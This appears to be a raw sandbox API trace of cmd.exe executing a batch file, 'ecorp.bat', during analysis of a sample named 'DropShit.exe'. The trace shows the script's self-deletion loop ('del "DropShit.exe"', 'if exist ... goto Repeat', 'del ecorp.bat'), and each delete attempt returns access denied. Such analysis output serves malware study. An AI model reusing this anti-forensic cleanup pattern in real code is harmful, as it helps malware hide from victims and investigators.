MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x4a9bc320, cbMultiByte=15, lpWideCharStr=0x4a9b7b60, cchWideChar=512 | out: lpWideCharStr="del ecorp.bat\r\n") returned 15 [0091.999] _get_osfhandle (_FileHandle=3) returned 0x5c [0091.999] SetFilePointer (in: hFile=0x5c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x51 [0091.999] _get_osfhandle (_FileHandle=3) returned 0x5c [0091.999] GetFileType (hFile=0x5c) returned 0x1 [0091.999] SetFilePointer (in: hFile=0x5c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x51 [0091.999] ReadFile (in: hFile=0x5c, lpBuffer=0x4a9bc320, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x14e7b0, lpOverlapped=0x0 | out: lpBuffer=0x4a9bc320*, lpNumberOfBytesRead=0x14e7b0*=0x0, lpOverlapped=0x0) returned 1 [0091.999] _get_osfhandle (_FileHandle=3) returned 0x5c [0091.999] SetFilePointer (in: hFile=0x5c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0092.000] _get_osfhandle (_FileHandle=3) returned 0x5c [0092.000] SetFilePointer (in: hFile=0x5c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0092.000] _get_osfhandle (_FileHandle=3) returned 0x5c [0092.000] GetFileType (hFile=0x5c) returned 0x1 [0092.000] SetFilePointer (in: hFile=0x5c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0092.000] ReadFile (in: hFile=0x5c, lpBuffer=0x4a9bc320, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x14e7b0, lpOverlapped=0x0 | out: lpBuffer=0x4a9bc320*, lpNumberOfBytesRead=0x14e7b0*=0x51, lpOverlapped=0x0) returned 1 [0092.000] SetFilePointer (in: hFile=0x5c, lDistanceToMove=9, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x9 [0092.000] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x4a9bc320, cbMultiByte=9, lpWideCharStr=0x4a9b7b60, cchWideChar=512 | out: lpWideCharStr=":Repeat\r\n.bat\r\n") returned 9 [0092.000] _close (_FileHandle=3) returned 0 [0092.000] _get_osfhandle (_FileHandle=1) returned 0x7 [0092.000] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0092.000] _get_osfhandle (_FileHandle=1) returned 0x7 [0092.000] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a9ae194 | out: lpMode=0x4a9ae194) returned 1 [0092.000] _get_osfhandle (_FileHandle=0) returned 0x3 [0092.000] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a9ae198 | out: lpMode=0x4a9ae198) returned 1 [0092.001] SetConsoleInputExeNameW () returned 0x1 [0092.001] GetConsoleOutputCP () returned 0x1b5 [0092.001] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9bbfe0 | out: lpCPInfo=0x4a9bbfe0) returned 1 [0092.001] SetThreadUILanguage (LangId=0x0) returned 0x7fffffd0409 [0092.001] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ecorp.bat" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\ecorp.bat"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x14ef58, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5c [0092.001] _open_osfhandle (_OSFileHandle=0x5c, _Flags=8) returned 3 [0092.001] _get_osfhandle (_FileHandle=3) returned 0x5c [0092.001] SetFilePointer (in: hFile=0x5c, lDistanceToMove=9, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x9 [0092.001] GetProcessHeap () returned 0x250000 [0092.001] HeapFree (in: hHeap=0x250000, dwFlags=0x0, lpMem=0x266aa0 | out: hHeap=0x250000) returned 1 [0092.001] GetProcessHeap () returned 0x250000 [0092.001] HeapFree (in: hHeap=0x250000, dwFlags=0x0, lpMem=0x278ff0 | out: hHeap=0x250000) returned 1 [0092.001] GetProcessHeap () returned 0x250000 [0092.001] HeapFree (in: hHeap=0x250000, dwFlags=0x0, lpMem=0x278fc0 | out: hHeap=0x250000) returned 1 [0092.001] GetProcessHeap () returned 0x250000 [0092.001] HeapFree (in: hHeap=0x250000, dwFlags=0x0, lpMem=0x278f90 | out: hHeap=0x250000) returned 1 [0092.001] GetProcessHeap () returned 0x250000 [0092.001] HeapFree (in: hHeap=0x250000, dwFlags=0x0, lpMem=0x26d0b0 | out: hHeap=0x250000) returned 1 [0092.001] GetProcessHeap () returned 0x250000 [0092.001] HeapFree (in: hHeap=0x250000, dwFlags=0x0, lpMem=0x26ccf0 | out: hHeap=0x250000) returned 1 [0092.001] GetProcessHeap () returned 0x250000 [0092.001] HeapFree (in: hHeap=0x250000, dwFlags=0x0, lpMem=0x266a60 | out: hHeap=0x250000) returned 1 [0092.001] GetProcessHeap () returned 0x250000 [0092.001] HeapFree (in: hHeap=0x250000, dwFlags=0x0, lpMem=0x2645e0 | out: hHeap=0x250000) returned 1 [0092.001] GetProcessHeap () returned 0x250000 [0092.001] HeapFree (in: hHeap=0x250000, dwFlags=0x0, lpMem=0x26cff0 | out: hHeap=0x250000) returned 1 [0092.001] GetProcessHeap () returned 0x250000 [0092.001] HeapFree (in: hHeap=0x250000, dwFlags=0x0, lpMem=0x264610 | out: hHeap=0x250000) returned 1 [0092.001] GetProcessHeap () returned 0x250000 [0092.001] HeapFree (in: hHeap=0x250000, dwFlags=0x0, lpMem=0x27a2f0 | out: hHeap=0x250000) returned 1 [0092.002] GetProcessHeap () returned 0x250000 [0092.002] HeapFree (in: hHeap=0x250000, dwFlags=0x0, lpMem=0x26cf30 | out: hHeap=0x250000) returned 1 [0092.002] _get_osfhandle (_FileHandle=3) returned 0x5c [0092.002] SetFilePointer (in: hFile=0x5c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x9 [0092.002] ReadFile (in: hFile=0x5c, lpBuffer=0x4a9bc320, nNumberOfBytesToRead=0x1fff, lpNumberOfBytesRead=0x14ed60, lpOverlapped=0x0 | out: lpBuffer=0x4a9bc320*, lpNumberOfBytesRead=0x14ed60*=0x48, lpOverlapped=0x0) returned 1 [0092.002] SetFilePointer (in: hFile=0x5c, lDistanceToMove=29, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x1d [0092.002] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x4a9bc320, cbMultiByte=20, lpWideCharStr=0x4a9be320, cchWideChar=8191 | out: lpWideCharStr="del \"DropShit.exe\"\r\nxe\" goto Repeat\r\n") returned 20 [0092.002] _get_osfhandle (_FileHandle=3) returned 0x5c [0092.002] GetFileType (hFile=0x5c) returned 0x1 [0092.002] _get_osfhandle (_FileHandle=3) returned 0x5c [0092.002] SetFilePointer (in: hFile=0x5c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x1d [0092.002] GetProcessHeap () returned 0x250000 [0092.002] RtlAllocateHeap (HeapHandle=0x250000, Flags=0x8, Size=0x4012) returned 0x27a760 [0092.002] GetProcessHeap () returned 0x250000 [0092.002] HeapFree (in: hHeap=0x250000, dwFlags=0x0, lpMem=0x27a760 | out: hHeap=0x250000) returned 1 [0092.002] GetProcessHeap () returned 0x250000 [0092.002] RtlAllocateHeap (HeapHandle=0x250000, Flags=0x8, Size=0xb0) returned 0x26cf30 [0092.002] GetProcessHeap () returned 0x250000 [0092.002] RtlAllocateHeap (HeapHandle=0x250000, Flags=0x8, Size=0x18) returned 0x27a2f0 [0092.002] GetProcessHeap () returned 0x250000 [0092.002] RtlAllocateHeap (HeapHandle=0x250000, Flags=0x8, Size=0x30) returned 0x266a60 [0092.002] _tell (_FileHandle=3) returned 29 [0092.002] _close (_FileHandle=3) returned 0 [0092.002] _vsnwprintf (in: _Buffer=0x4a9c6340, _BufferCount=0x1fff, _Format="\r\n", _ArgList=0x14ecf8 | out: _Buffer="\r\n") returned 2 [0092.002] _get_osfhandle (_FileHandle=1) returned 0x7 [0092.002] GetFileType (hFile=0x7) returned 0x2 [0092.003] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0092.003] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x14ec88 | out: lpMode=0x14ec88) returned 1 [0092.003] _get_osfhandle (_FileHandle=1) returned 0x7 [0092.003] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x4a9c6340*, nNumberOfCharsToWrite=0x2, lpNumberOfCharsWritten=0x14ecc8, lpReserved=0x0 | out: lpBuffer=0x4a9c6340*, lpNumberOfCharsWritten=0x14ecc8*=0x2) returned 1 [0092.003] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a9bc0a0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 0x25 [0092.003] _vsnwprintf (in: _Buffer=0x4a9aeb60, _BufferCount=0x3fe, _Format="%s", _ArgList=0x14ed08 | out: _Buffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 37 [0092.004] _vsnwprintf (in: _Buffer=0x4a9aebaa, _BufferCount=0x3d9, _Format="%c", _ArgList=0x14ed08 | out: _Buffer=">") returned 1 [0092.004] _get_osfhandle (_FileHandle=1) returned 0x7 [0092.004] GetFileType (hFile=0x7) returned 0x2 [0092.004] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0092.004] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x14ecb8 | out: lpMode=0x14ecb8) returned 1 [0092.004] _get_osfhandle (_FileHandle=1) returned 0x7 [0092.004] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x4a9aeb60*, nNumberOfCharsToWrite=0x26, lpNumberOfCharsWritten=0x14ecf8, lpReserved=0x0 | out: lpBuffer=0x4a9aeb60*, lpNumberOfCharsWritten=0x14ecf8*=0x26) returned 1 [0092.004] _get_osfhandle (_FileHandle=1) returned 0x7 [0092.004] GetFileType (hFile=0x7) returned 0x2 [0092.004] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0092.004] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x14ef98 | out: lpMode=0x14ef98) returned 1 [0092.005] _get_osfhandle (_FileHandle=1) returned 0x7 [0092.005] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x27a300*, nNumberOfCharsToWrite=0x3, lpNumberOfCharsWritten=0x14efd8, lpReserved=0x0 | out: lpBuffer=0x27a300*, lpNumberOfCharsWritten=0x14efd8*=0x3) returned 1 [0092.005] _vsnwprintf (in: _Buffer=0x4a9c6340, _BufferCount=0x1fff, _Format="%s ", _ArgList=0x14efd8 | out: _Buffer=" \"DropShit.exe\" ") returned 16 [0092.005] _get_osfhandle (_FileHandle=1) returned 0x7 [0092.005] GetFileType (hFile=0x7) returned 0x2 [0092.005] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0092.005] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x14ef68 | out: lpMode=0x14ef68) returned 1 [0092.005] _get_osfhandle (_FileHandle=1) returned 0x7 [0092.005] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x4a9c6340*, nNumberOfCharsToWrite=0x10, lpNumberOfCharsWritten=0x14efa8, lpReserved=0x0 | out: lpBuffer=0x4a9c6340*, lpNumberOfCharsWritten=0x14efa8*=0x10) returned 1 [0092.006] _vsnwprintf (in: _Buffer=0x4a9c6340, _BufferCount=0x1fff, _Format="\r\n", _ArgList=0x14efd8 | out: _Buffer="\r\n") returned 2 [0092.006] _get_osfhandle (_FileHandle=1) returned 0x7 [0092.006] GetFileType (hFile=0x7) returned 0x2 [0092.006] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0092.006] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x14ef68 | out: lpMode=0x14ef68) returned 1 [0092.006] _get_osfhandle (_FileHandle=1) returned 0x7 [0092.006] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x4a9c6340*, nNumberOfCharsToWrite=0x2, lpNumberOfCharsWritten=0x14efa8, lpReserved=0x0 | out: lpBuffer=0x4a9c6340*, lpNumberOfCharsWritten=0x14efa8*=0x2) returned 1 [0092.006] _wcsicmp (_String1="del", _String2="DIR") returned -4 [0092.006] _wcsicmp (_String1="del", _String2="ERASE") returned -1 [0092.006] _wcsicmp (_String1="del", _String2="DEL") returned 0 [0092.006] GetConsoleTitleW (in: lpConsoleTitle=0x14ed00, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0092.007] GetProcessHeap () returned 0x250000 [0092.007] RtlAllocateHeap (HeapHandle=0x250000, Flags=0x8, Size=0x50) returned 0x26ccf0 [0092.007] GetProcessHeap () returned 0x250000 [0092.007] RtlReAllocateHeap (Heap=0x250000, Flags=0x0, Ptr=0x26ccf0, Size=0x30) returned 0x26ccf0 [0092.007] GetProcessHeap () returned 0x250000 [0092.007] RtlSizeHeap (HeapHandle=0x250000, Flags=0x0, MemoryPointer=0x26ccf0) returned 0x30 [0092.007] GetProcessHeap () returned 0x250000 [0092.007] RtlAllocateHeap (HeapHandle=0x250000, Flags=0x8, Size=0x38) returned 0x266aa0 [0092.007] GetProcessHeap () returned 0x250000 [0092.007] RtlAllocateHeap (HeapHandle=0x250000, Flags=0x8, Size=0x50) returned 0x26cd30 [0092.007] GetProcessHeap () returned 0x250000 [0092.007] RtlReAllocateHeap (Heap=0x250000, Flags=0x0, Ptr=0x26cd30, Size=0x30) returned 0x26cd30 [0092.007] GetProcessHeap () returned 0x250000 [0092.007] RtlSizeHeap (HeapHandle=0x250000, Flags=0x0, MemoryPointer=0x26cd30) returned 0x30 [0092.007] GetProcessHeap () returned 0x250000 [0092.007] RtlAllocateHeap (HeapHandle=0x250000, Flags=0x8, Size=0x2a) returned 0x266ae0 [0092.007] GetCurrentDirectoryW (in: nBufferLength=0x106, lpBuffer=0x14e860 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 0x25 [0092.007] GetProcessHeap () returned 0x250000 [0092.007] RtlAllocateHeap (HeapHandle=0x250000, Flags=0x8, Size=0x58) returned 0x26cd70 [0092.007] GetCurrentDirectoryW (in: nBufferLength=0x106, lpBuffer=0x14d770 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 0x25 [0092.007] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x0, nVolumeNameSize=0x0, lpVolumeSerialNumber=0x0, lpMaximumComponentLength=0x14da28, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x14e280, nFileSystemNameSize=0x106 | out: lpVolumeNameBuffer=0x0, lpVolumeSerialNumber=0x0, lpMaximumComponentLength=0x14da28*=0xff, lpFileSystemFlags=0x0, lpFileSystemNameBuffer="NTFS") returned 1 [0092.007] _wcsicmp (_String1="NTFS", _String2="FAT") returned 8 [0092.007] GetProcessHeap () returned 0x250000 [0092.007] RtlAllocateHeap (HeapHandle=0x250000, Flags=0x8, Size=0x58) returned 0x26cdd0 [0092.007] GetProcessHeap () returned 0x250000 [0092.007] RtlAllocateHeap (HeapHandle=0x250000, Flags=0x8, Size=0x260) returned 0x2518c0 [0092.007] _wcsicmp (_String1="DropShit.exe", _String2=".") returned 54 [0092.007] _wcsicmp (_String1="DropShit.exe", _String2="..") returned 54 [0092.007] GetFileAttributesW (lpFileName="DropShit.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\dropshit.exe")) returned 0x20 [0092.008] GetProcessHeap () returned 0x250000 [0092.008] RtlAllocateHeap (HeapHandle=0x250000, Flags=0x8, Size=0x218) returned 0x251b30 [0092.008] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x251b40 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 0x25 [0092.008] SetErrorMode (uMode=0x0) returned 0x0 [0092.008] SetErrorMode (uMode=0x1) returned 0x0 [0092.008] GetFullPathNameW (in: lpFileName="DropShit.exe", nBufferLength=0x104, lpBuffer=0x14d790, lpFilePart=0x14d780 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\DropShit.exe", lpFilePart=0x14d780*="DropShit.exe") returned 0x32 [0092.008] SetErrorMode (uMode=0x0) returned 0x1 [0092.008] GetProcessHeap () returned 0x250000 [0092.008] RtlAllocateHeap (HeapHandle=0x250000, Flags=0x8, Size=0x260) returned 0x26ef00 [0092.008] _wcsicmp (_String1="DropShit.exe", _String2=".") returned 54 [0092.008] _wcsicmp (_String1="DropShit.exe", _String2="..") returned 54 [0092.008] GetFileAttributesW (lpFileName="DropShit.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\dropshit.exe")) returned 0x20 [0092.008] GetProcessHeap () returned 0x250000 [0092.008] RtlAllocateHeap (HeapHandle=0x250000, Flags=0x8, Size=0x2a) returned 0x266b20 [0092.008] GetProcessHeap () returned 0x250000 [0092.008] RtlAllocateHeap (HeapHandle=0x250000, Flags=0x8, Size=0x5c) returned 0x26ce30 [0092.008] GetProcessHeap () returned 0x250000 [0092.008] RtlAllocateHeap (HeapHandle=0x250000, Flags=0x8, Size=0x5c) returned 0x26f170 [0092.008] GetProcessHeap () returned 0x250000 [0092.008] RtlAllocateHeap (HeapHandle=0x250000, Flags=0x8, Size=0x810) returned 0x26f1e0 [0092.008] FindFirstFileExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\DropShit.exe", fInfoLevelId=0x0, lpFindFileData=0x26f1f4, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x26f1f4) returned 0x26cea0 [0092.008] DeleteFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\DropShit.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\dropshit.exe")) returned 0 [0092.009] DeleteFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\DropShit.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\dropshit.exe")) returned 0 [0092.009] GetLastError () returned 0x5 [0092.009] _vsnwprintf (in: _Buffer=0x4a9c6340, _BufferCount=0x1fff, _Format="%s\r\n", _ArgList=0x14dc38 | out: _Buffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\DropShit.exe\r\n") returned 52 [0092.009] _get_osfhandle (_FileHandle=1) returned 0x7 [0092.009] GetFileType (hFile=0x7) returned 0x2 [0092.009] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0092.009] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x14dbc8 | out: lpMode=0x14dbc8) returned 1 [0092.009] _get_osfhandle (_FileHandle=1) returned 0x7 [0092.009] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x4a9c6340*, nNumberOfCharsToWrite=0x34, lpNumberOfCharsWritten=0x14dc08, lpReserved=0x0 | out: lpBuffer=0x4a9c6340*, lpNumberOfCharsWritten=0x14dc08*=0x34) returned 1 [0092.010] _get_osfhandle (_FileHandle=2) returned 0xb [0092.010] GetFileType (hFile=0xb) returned 0x2 [0092.010] GetStdHandle (nStdHandle=0xfffffff4) returned 0xb [0092.010] GetConsoleMode (in: hConsoleHandle=0xb, lpMode=0x14db68 | out: lpMode=0x14db68) returned 1 [0092.010] _get_osfhandle (_FileHandle=2) returned 0xb [0092.010] GetConsoleScreenBufferInfo (in: hConsoleOutput=0xb, lpConsoleScreenBufferInfo=0x14dba0 | out: lpConsoleScreenBufferInfo=0x14dba0) returned 1 [0092.010] FormatMessageW (in: dwFlags=0x1a00, lpSource=0x0, dwMessageId=0x5, dwLanguageId=0x0, lpBuffer=0x4a9c6340, nSize=0x2000, Arguments=0x0 | out: lpBuffer="Access is denied.\r\n") returned 0x13 [0092.010] FormatMessageW (in: dwFlags=0x1800, lpSource=0x0, dwMessageId=0x5, dwLanguageId=0x0, lpBuffer=0x4a9c6340, nSize=0x2000, Arguments=0x14dc10 | out: lpBuffer="Access is denied.\r\n") returned 0x13 [0092.010] WriteConsoleW (in: hConsoleOutput=0xb, lpBuffer=0x4a9c6340*, nNumberOfCharsToWrite=0x13, lpNumberOfCharsWritten=0x14db90, lpReserved=0x0 | out: lpBuffer=0x4a9c6340*, lpNumberOfCharsWritten=0x14db90*=0x13) returned 1 [0092.011] FindNextFileW (in: hFindFile=0x26cea0, lpFindFileData=0x26f1f4 | out: lpFindFileData=0x26f1f4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xec7a8400, ftCreationTime.dwHighDateTime=0x1d53bb1, ftLastAccessTime.dwLowDateTime=0xed131a80, ftLastAccessTime.dwHighDateTime=0x1d53bb1, ftLastWriteTime.dwLowDateTime=0xeb495700, ftLastWriteTime.dwHighDateTime=0x1d53bb1, nFileSizeHigh=0x0, nFileSizeLow=0x9600, dwReserved0=0x0, dwReserved1=0x0, cFileName="DropShit.exe", cAlternateFileName="")) returned 0 [0092.011] GetLastError () returned 0x12 [0092.011] FindClose (in: hFindFile=0x26cea0 | out: hFindFile=0x26cea0) returned 1 [0092.011] GetProcessHeap () returned 0x250000 [0092.011] HeapFree (in: hHeap=0x250000, dwFlags=0x0, lpMem=0x26f1e0 | out: hHeap=0x250000) returned 1 [0092.011] GetProcessHeap () returned 0x250000 [0092.011] HeapFree (in: hHeap=0x250000, dwFlags=0x0, lpMem=0x26f170 | out: hHeap=0x250000) returned 1 [0092.011] GetProcessHeap () returned 0x250000 [0092.011] HeapFree (in: hHeap=0x250000, dwFlags=0x0, lpMem=0x266b20 | out: hHeap=0x250000) returned 1 [0092.011] GetProcessHeap () returned 0x250000 [0092.011] HeapFree (in: hHeap=0x250000, dwFlags=0x0, lpMem=0x26ce30 | out: hHeap=0x250000) returned 1 [0092.011] GetProcessHeap () returned 0x250000 [0092.011] HeapFree (in: hHeap=0x250000, dwFlags=0x0, lpMem=0x26ef00 | out: hHeap=0x250000) returned 1 [0092.011] GetProcessHeap () returned 0x250000 [0092.011] HeapFree (in: hHeap=0x250000, dwFlags=0x0, lpMem=0x251b30 | out: hHeap=0x250000) returned 1 [0092.011] GetProcessHeap () returned 0x250000 [0092.011] HeapFree (in: hHeap=0x250000, dwFlags=0x0, lpMem=0x2518c0 | out: hHeap=0x250000) returned 1 [0092.011] GetProcessHeap () returned 0x250000 [0092.011] HeapFree (in: hHeap=0x250000, dwFlags=0x0, lpMem=0x26cdd0 | out: hHeap=0x250000) returned 1 [0092.011] GetProcessHeap () returned 0x250000 [0092.011] HeapFree (in: hHeap=0x250000, dwFlags=0x0, lpMem=0x26cd70 | out: hHeap=0x250000) returned 1 [0092.011] GetProcessHeap () returned 0x250000 [0092.011] HeapFree (in: hHeap=0x250000, dwFlags=0x0, lpMem=0x266ae0 | out: hHeap=0x250000) returned 1 [0092.011] GetProcessHeap () returned 0x250000 [0092.011] HeapFree (in: hHeap=0x250000, dwFlags=0x0, lpMem=0x26cd30 | out: hHeap=0x250000) returned 1 [0092.011] _get_osfhandle (_FileHandle=1) returned 0x7 [0092.011] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0092.012] _get_osfhandle (_FileHandle=1) returned 0x7 [0092.012] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a9ae194 | out: lpMode=0x4a9ae194) returned 1 [0092.012] _get_osfhandle (_FileHandle=0) returned 0x3 [0092.012] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a9ae198 | out: lpMode=0x4a9ae198) returned 1 [0092.012] SetConsoleInputExeNameW () returned 0x1 [0092.012] GetConsoleOutputCP () returned 0x1b5 [0092.012] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9bbfe0 | out: lpCPInfo=0x4a9bbfe0) returned 1 [0092.012] SetThreadUILanguage (LangId=0x0) returned 0x7fffffd0409 [0092.012] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ecorp.bat" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\ecorp.bat"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x14ef58, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5c [0092.012] _open_osfhandle (_OSFileHandle=0x5c, _Flags=8) returned 3 [0092.012] _get_osfhandle (_FileHandle=3) returned 0x5c [0092.012] SetFilePointer (in: hFile=0x5c, lDistanceToMove=29, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x1d [0092.013] GetProcessHeap () returned 0x250000 [0092.013] HeapFree (in: hHeap=0x250000, dwFlags=0x0, lpMem=0x266aa0 | out: hHeap=0x250000) returned 1 [0092.013] GetProcessHeap () returned 0x250000 [0092.013] HeapFree (in: hHeap=0x250000, dwFlags=0x0, lpMem=0x26ccf0 | out: hHeap=0x250000) returned 1 [0092.013] GetProcessHeap () returned 0x250000 [0092.013] HeapFree (in: hHeap=0x250000, dwFlags=0x0, lpMem=0x266a60 | out: hHeap=0x250000) returned 1 [0092.013] GetProcessHeap () returned 0x250000 [0092.013] HeapFree (in: hHeap=0x250000, dwFlags=0x0, lpMem=0x27a2f0 | out: hHeap=0x250000) returned 1 [0092.013] GetProcessHeap () returned 0x250000 [0092.013] HeapFree (in: hHeap=0x250000, dwFlags=0x0, lpMem=0x26cf30 | out: hHeap=0x250000) returned 1 [0092.013] _get_osfhandle (_FileHandle=3) returned 0x5c [0092.013] SetFilePointer (in: hFile=0x5c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x1d [0092.013] ReadFile (in: hFile=0x5c, lpBuffer=0x4a9bc320, nNumberOfBytesToRead=0x1fff, lpNumberOfBytesRead=0x14ed60, lpOverlapped=0x0 | out: lpBuffer=0x4a9bc320*, lpNumberOfBytesRead=0x14ed60*=0x34, lpOverlapped=0x0) returned 1 [0092.013] SetFilePointer (in: hFile=0x5c, lDistanceToMove=66, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x42 [0092.013] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x4a9bc320, cbMultiByte=37, lpWideCharStr=0x4a9be320, cchWideChar=8191 | out: lpWideCharStr="if exist \"DropShit.exe\" goto Repeat\r\n") returned 37 [0092.013] _get_osfhandle (_FileHandle=3) returned 0x5c [0092.013] GetFileType (hFile=0x5c) returned 0x1 [0092.013] _get_osfhandle (_FileHandle=3) returned 0x5c [0092.013] SetFilePointer (in: hFile=0x5c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x42 [0092.013] GetProcessHeap () returned 0x250000 [0092.013] RtlAllocateHeap (HeapHandle=0x250000, Flags=0x8, Size=0x4012) returned 0x27c760 [0092.013] GetProcessHeap () returned 0x250000 [0092.013] HeapFree (in: hHeap=0x250000, dwFlags=0x0, lpMem=0x27c760 | out: hHeap=0x250000) returned 1 [0092.013] GetProcessHeap () returned 0x250000 [0092.013] RtlAllocateHeap (HeapHandle=0x250000, Flags=0x8, Size=0xb0) returned 0x26cf30 [0092.013] GetProcessHeap () returned 0x250000 [0092.013] RtlAllocateHeap (HeapHandle=0x250000, Flags=0x8, Size=0x16) returned 0x27a2f0 [0092.013] GetProcessHeap () returned 0x250000 [0092.013] RtlAllocateHeap (HeapHandle=0x250000, Flags=0x8, Size=0x28) returned 0x264610 [0092.013] GetProcessHeap () returned 0x250000 [0092.014] RtlReAllocateHeap (Heap=0x250000, Flags=0x0, Ptr=0x264610, Size=0x1e) returned 0x2645e0 [0092.014] GetProcessHeap () returned 0x250000 [0092.014] RtlSizeHeap (HeapHandle=0x250000, Flags=0x0, MemoryPointer=0x2645e0) returned 0x1e [0092.014] _wcsicmp (_String1="exist", _String2="/I") returned 54 [0092.014] GetProcessHeap () returned 0x250000 [0092.014] RtlAllocateHeap (HeapHandle=0x250000, Flags=0x8, Size=0xb0) returned 0x26cff0 [0092.014] GetProcessHeap () returned 0x250000 [0092.014] RtlAllocateHeap (HeapHandle=0x250000, Flags=0x8, Size=0x1c) returned 0x264610 [0092.014] _wcsicmp (_String1="ERRORLEVEL", _String2="exist") returned -6 [0092.014] _wcsicmp (_String1="EXIST", _String2="exist") returned 0 [0092.014] GetProcessHeap () returned 0x250000 [0092.014] RtlAllocateHeap (HeapHandle=0x250000, Flags=0x8, Size=0x2e) returned 0x266a60 [0092.014] GetProcessHeap () returned 0x250000 [0092.014] RtlAllocateHeap (HeapHandle=0x250000, Flags=0x8, Size=0x4c) 